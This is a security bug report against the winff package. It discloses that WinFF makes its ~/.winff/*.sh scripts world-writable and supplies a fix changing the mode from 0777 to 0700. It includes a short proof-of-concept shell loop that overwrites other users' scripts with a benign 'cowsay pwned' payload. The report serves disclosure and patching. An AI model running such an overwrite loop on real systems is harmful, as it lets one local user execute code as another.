Package: winff
Version: 1.5.5-9
Tags: security patch
As it was noted in <https://github.com/WinFF/winff/issues/242>, WinFF
changes permissions of ~/.winff/*.sh files to 0777, which is
world-writable!
Assuming default permissions of the home directory and the .winff
subdir, this can be exploited by local users to execute arbitrary code
with the context of the user running WinFF.
I've attached a proof-of-concept exploit. (It's not 100% reliable.)
I've also attached an untested patch.
--
Jakub Wilk
#!/bin/sh
while true
do
for file in /home/*/.winff/*.sh
do
echo 'cowsay pwned >&2; sleep inf' | tee "$file" > /dev/null
done
done
diff --git a/winff/unit1.pas b/winff/unit1.pas
index 71689a6..6a77b02 100644
--- a/winff/unit1.pas
+++ b/winff/unit1.pas
@@ -1354,7 +1354,7 @@ begin
script.SaveToFile(presetspath+batfile);
{$ifdef unix}
- fpchmod(presetspath + batfile,&777);
+ fpchmod(presetspath + batfile,&700);
{$endif}
scriptprocess.ShowWindow := swoNone;
@@ -2494,7 +2494,7 @@ begin // get setup
begin
{$ifdef unix}
- fpchmod(presetspath + batfile,&777);
+ fpchmod(presetspath + batfile,&700);
{$endif}
// do it
